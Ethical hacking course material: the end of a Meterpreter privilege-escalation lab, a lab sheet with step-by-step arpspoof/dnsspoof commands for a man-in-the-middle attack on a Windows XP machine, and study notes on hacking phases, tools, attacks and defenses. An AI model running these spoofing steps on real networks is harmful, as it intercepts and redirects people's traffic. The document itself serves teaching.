20. Check for Privilege Escalation
a. Getsystem

Stop session

21. Exit
a. exit
 Ethical Hacking – Lab 4
ARP and DNS spoofing

Description

Combined ARP and DNS spoofing attack to intercept and alter DNS queries.

Tools Required:

Kali Linux with arpspoof, dnsspoof, and Wireshark installed.
Windows XP machine.

Steps

1. Prepare Kali Linux

a. Ensure Apache is installed and running
i. sudo apt-get update
ii. sudo apt-get install apache2
iii. sudo systemctl start apache2
iv. sudo apt-get install dsniff
b. Create a fake webpage
i. echo "You have been
redirected!" | sudo tee /var/www/html/index.html

2. Setup ARP Spoofing

a. Identify network interface and IPs
i. Ipconfig
ii. ifconfig
b. Start ARP spoofing to become the MITM
i. Determine Gateway ip then
1. route -n
ii. sudo arpspoof -i eth0 -t [Windows XP IP] [Gateway IP]
iii. sudo arpspoof -i eth0 -t [Gateway IP] [Windows XP IP]
iv. here eth0 should be your interface, you may have to double check with
your ipconfig to see if its eth0 or wlan0 etc.
3. Execution of the Attack

a. Enable IP Forwarding on Kali (To forward packets between the Windows XP
machine and the gateway)
i. echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
b. Set up DNS Spoofing
i. Prepare dnsspoof to intercept DNS queries
1. sudo dnsspoof -i eth0
c. Monitor the Attack
i. Launch Wireshark to capture packets
1. sudo wireshark &
ii. Filter for DNS and ARP traffic
1. Enter arp or dns in the filter bar to observe both ARP spoofing
activities and DNS requests and responses
d. Testing the Attack
i. On the Windows XP machine, attempt to visit known websites like
www.google.com
e. Stop ARP and DNS spoofing and Apache on Kali
i. sudo killall arpspoof
ii. sudo killall dnsspoof
iii. sudo systemctl stop apache2
f. Disable IP forwarding
i. echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward

Guidelines

Show screenshots of each activity
Upload the document on or before 10.00am @ 10th of August.
Best reports will get 2 extra marks for your results.
1. Intro to Ethical Hacking

 Definition: Ethical hacking is all about legally breaking into computers and
systems to check out how strong their defenses are. White hat hackers (that’s
the good guys) use the same tricks as the bad guys (black hats), but they do it
with permission.
 Why it Matters:

o Spotting Weak Spots: Finding issues before real hackers do.

o Beefing Up Security: Fixing any weak points found.
o Following the Rules: Making sure the system is up to scratch with
legal standards like PCI-DSS or HIPAA.
 Examples:

o Bug Bounty Programs: Companies like Google and Facebook offer
rewards for finding bugs.
o Penetration Testing: Simulating an attack to see how well the
defenses hold up.
2. Types of Hackers

 Black Hat Hackers:

o Motivation: Usually after money, causing chaos, or spying.

o What They Do: Spreading viruses, stealing data, messing with
websites.
o Example:

 Kevin Mitnick (before he turned into a white hat) - Known for
hacking into big companies like IBM and Nokia.
 White Hat Hackers:

o Motivation: To help companies stay safe by improving security.

o What They Do: Conducting security tests, finding vulnerabilities,
participating in bug bounty programs.
o Example:

 Charlie Miller - Famous for finding flaws in Apple products.

 Gray Hat Hackers:

o Motivation: Bit of both - they hack without permission but usually don’t
mean harm and report what they find.
 o What They Do: Hacking into systems without consent, then telling the
company about it.
o Example:
 Anonymous - A group known for various "hacktivist" activities.

Note: Gray hat activities are in a gray area (no pun intended) legally and ethically.
Some places consider it illegal no matter the intention.
3. Phases of Ethical Hacking

 Reconnaissance (Footprinting):

o Goal: Gather as much info as you can about the target.

o Methods:

 Passive Recon: No direct contact with the target (e.g., Google
Dorking, WHOIS, DNS lookups).
 Active Recon: Directly interacting with the target (e.g., ping
sweeps, port scans).
o Tools: Maltego, Recon-ng.

 Scanning:

o Goal: Find open ports, services, and any potential vulnerabilities.

o Methods:
 Port Scanning: Identifying open ports (e.g., using Nmap).

 Vulnerability Scanning: Checking for known vulnerabilities
(e.g., Nessus or OpenVAS).
o Tools: Nmap, Nessus, OpenVAS, Nikto.

 Gaining Access:

o Goal: Exploit vulnerabilities to get into the target system.

o Methods:

 Exploitation: Using tools to exploit vulnerabilities (e.g., buffer
overflow, SQL injection).
 Brute Force: Repeatedly guessing passwords or keys.

o Tools: Metasploit, Hydra, SQLmap.

 Maintaining Access:
o Goal: Stay in the system once you’re in.
 o Methods:

 Backdoors: Installing something that lets you back in later (e.g.,
Netcat, Meterpreter).
 Privilege Escalation: Getting higher permissions than you
originally had.
o Tools: Netcat, Meterpreter, Cobalt Strike.

 Covering Tracks:

o Goal: Hide any evidence of your activity.

o Methods:

 Log Manipulation: Deleting or editing log files.

 Timestomp: Changing timestamps on files to avoid detection.
o Tools: Metasploit, Timestomp, CCleaner.

4. Common Tools in Ethical Hacking
 Nmap:

o What It’s For: Network scanning and finding out what’s open and
what’s not.
o Capabilities: Can identify open ports, services, and even guess what
OS the target’s using.
 Wireshark:

o What It’s For: Analyzing network traffic.

o Capabilities: Captures packets to see what data is being sent around.
Super handy for spotting suspicious stuff.
 Metasploit:

o What It’s For: Penetration testing.

o Capabilities: Packed with exploits, payloads, and all sorts of tools for
finding and using vulnerabilities.
 John the Ripper:

o What It’s For: Password cracking.

o Capabilities: Can guess passwords using brute force or by trying out
common words from a dictionary.
 Burp Suite:
 o What It’s For: Web app security testing.

o Capabilities: Can scan websites for vulnerabilities like SQL injection,
XSS, and more.
 Nessus/OpenVAS:

o What They’re For: Vulnerability scanning.

o Capabilities: They scan networks, systems, and apps for known
vulnerabilities.
 Hydra:

o What It’s For: Brute force password cracking.

o Capabilities: Can try to crack passwords over multiple protocols like
HTTP, FTP, SMTP, etc.
5. Vulnerabilities and Exploits

 Vulnerability:

o What It Is: A weak spot in a system that a hacker can take advantage
of.
o Examples: Unpatched software, weak passwords, or poorly configured
systems.
 Exploit:

o What It Is: A way to take advantage of a vulnerability to gain
unauthorized access.
o Examples:

 RCE (Remote Code Execution): Running code on a remote
system.
 SQL Injection: Inserting malicious SQL code to mess with a
database.
6. Encryption and Cryptography

 Encryption Methods:
o AES (Advanced Encryption Standard):

 What It’s Used For: Encrypting data. It’s strong and widely
used.
 Key Sizes: 128, 192, or 256 bits.
o RSA (Rivest-Shamir-Adleman):
  What It’s Used For: Securing data transmission, like sending
encrypted emails.
 Key Sizes: Usually 2048-bit keys.
o Symmetric vs. Asymmetric Encryption:

 Symmetric: Same key for encryption and decryption (e.g.,
AES).
 Asymmetric: Different keys for encryption and decryption (e.g.,
RSA). RSA is usually used to secure the key exchange rather
than the data itself.
o Hashing Algorithms:

 MD5 and SHA-1: Old but still around. They’ve got
vulnerabilities, so they’re not recommended for critical stuff.
 SHA-256: More secure and used in things like blockchain and
digital signatures.
 SSL/TLS:

o What It’s For: Encrypting data sent over the internet (like HTTPS).

o Importance: Keeps your data safe while it’s being transmitted.

7. Network Security Concepts

 Firewalls:

o Types:

 Network-based: Protects entire networks (like a castle wall).

 Host-based: Protects individual devices (like personal armor).

o Functions: Blocks unauthorized traffic and lets the good stuff through.
 Intrusion Detection Systems (IDS):

o Types:

 NIDS (Network IDS): Monitors network traffic for signs of
trouble.
 HIDS (Host IDS): Monitors individual devices for suspicious
changes or activity.
o Examples: Snort, Suricata.

 Intrusion Prevention Systems (IPS):
 o What They Do: Like IDS, but they don’t just detect - they block the bad
stuff too.
o Examples: Cisco IPS, Palo Alto Networks.
 Honeypots:

o What They’re For: Luring in attackers so you can study them.

o Types:

 Low-Interaction: Simulates basic services and captures simple
attacks.
 High-Interaction: Provides a more realistic environment and
can catch more sophisticated attacks.
o Benefits:

 Learning: You get to understand what attackers are up to.

 Detection: Spotting new threats before they hit real systems.

o Risks:

 Attracting Trouble: You might end up inviting real attacks.

 Maintenance: Takes time and effort to keep these things
running smoothly.
8. Social Engineering
 What It Is: Tricking people into giving up confidential info or doing something
they shouldn’t.
 Types:

o Phishing: Sending fake emails or messages to trick people into giving
up info.
o Spear Phishing: Targeted phishing aimed at specific people or
companies.
o Pretexting: Pretending to be someone else to get info.

o Baiting: Offering something tempting (like a free USB drive) to trick
someone into doing something.
o Tailgating: Following someone into a restricted area without them
noticing.
 How to Protect Against It:
o Training: Keep employees up to date on the latest scams.
 o Verification: Double-check before sharing sensitive info.

o Email Filters: Use advanced spam filters to catch phishing attempts.

Note: Social engineering tactics evolve all the time. It’s a cat-and-mouse game, so
staying updated is key.
9. Types of Cyber Attacks

 Denial of Service (DoS) and Distributed Denial of Service (DDoS):

o What It’s About: Flooding a system or network to make it crash or
become unavailable.
o Methods:

 Flood Attacks: Sending tons of traffic to overwhelm the target.

 Amplification Attacks: Using other servers to increase the
amount of traffic.
o How to Defend: DDoS protection services like Cloudflare, rate limiting,
and segmenting the network.
 Man-in-the-Middle (MitM):

o What It Is: Intercepting and potentially altering communication between
two parties.
o Techniques:

 ARP Spoofing: Tricking devices into sending traffic to the
attacker’s machine.
 SSL Stripping: Downgrading HTTPS connections to HTTP to
intercept data.
o How to Defend: Use HTTPS with strong certificates, VPNs, and
mutual authentication. SSL stripping is getting harder to pull off,
especially with HSTS in place.
 SQL Injection:

o What It Is: Injecting malicious SQL code into a query to manipulate the
database.
o Where It Happens: Mostly in web apps with input fields that aren’t
properly secured.
o How to Defend: Use prepared statements, parameterized queries, and
sanitize inputs.
 Cross-Site Scripting (XSS):
 o What It Is: Injecting malicious scripts into web pages viewed by other
users.
o Types:
 Stored XSS: The malicious script is saved on the server and
affects everyone.
 Reflected XSS: The malicious script is reflected off a web
server, usually via a query parameter.
o How to Defend: Sanitize input, escape output, and use Content
Security Policy (CSP).
 Buffer Overflow:

o What It Is: Overwriting a part of memory to execute malicious code.

o Methods:
 Stack Overflow: Overflows a buffer on the stack.

 Heap Overflow: Overflows a buffer on the heap.

o How to Defend: Write secure code, use ASLR (Address Space Layout
Randomization), and stack canaries.
10. Penetration Testing Process

 Planning and Recon:

o Goal: Set the scope, objectives, and rules for the pen test.

o Methods:
 Stakeholder Interviews: Find out what’s important and needs
protection.
 Legal Checks: Make sure everything is legally sound and
authorized.
 Scanning:

o Goal: Identify systems, services, and any possible weak spots.

o Methods:

 Network Mapping: Using tools like Nmap to see what’s out
there.
 Vulnerability Scanning: Tools like Nessus to find known
weaknesses.
 Exploitation:
 o Goal: Try to gain unauthorized access.

o Methods:

 Manual Exploitation: Using knowledge of vulnerabilities to craft
specific attacks.
 Automated Tools: Using frameworks like Metasploit to run
known exploits.
 Post-Exploitation:

o Goal: See how deep you can go and the potential impact.

o Methods:

 Privilege Escalation: Getting more control in the system.

 Data Exfiltration: Simulating stealing sensitive data.
o Lateral Movement: Moving across the network to access more
systems.
o Persistence: Setting up a way to get back in later.

 Reporting:

o Goal: Document everything you found and suggest fixes.

o What to Include:

 Executive Summary: Overview for non-tech folks.

 Technical Report: Detailed findings and technical suggestions.

 Fix-It Plan: How to fix the problems you found.

11. Legal and Ethical Considerations

 Authorization: Always get explicit written permission before starting anything.
This is not negotiable.
 Compliance: Know the laws and rules that apply to your work, like CFAA in
the U.S. or GDPR in Europe.
 Documentation: Keep detailed records of everything you do during a test,
just in case.
 Ethical Rules:

o Honesty: Be transparent about what you’re doing and what you find.

o Confidentiality: Keep any sensitive info you come across safe and
secure.
 o Professionalism: Always act in a professional and ethical way.

12. Real-World Applications and Case Studies

 Case Study 1: Target Data Breach:

o What Happened: Hackers got in through a third-party vendor (HVAC)
and installed malware on Target’s payment systems, stealing 40 million
credit card numbers.
o Lesson Learned: Third-party access needs to be locked down tight,
and network segmentation is crucial to limit damage if someone does
get in.
 Case Study 2: Equifax Data Breach:

o What Happened: A vulnerability in a web application was exploited,
leading to the exposure of data for over 147 million people.
o Lesson Learned: Timely patching is critical, and regular vulnerability
scans are a must.
 Best Practices:

o Defense in Depth: Layer your security controls to make it harder for
attackers to succeed.
o Zero Trust Architecture: Don’t trust anyone or anything by default,
and always verify.
o Continuous Monitoring: Keep an eye on your network and systems
all the time, and have a solid incident response plan ready to go.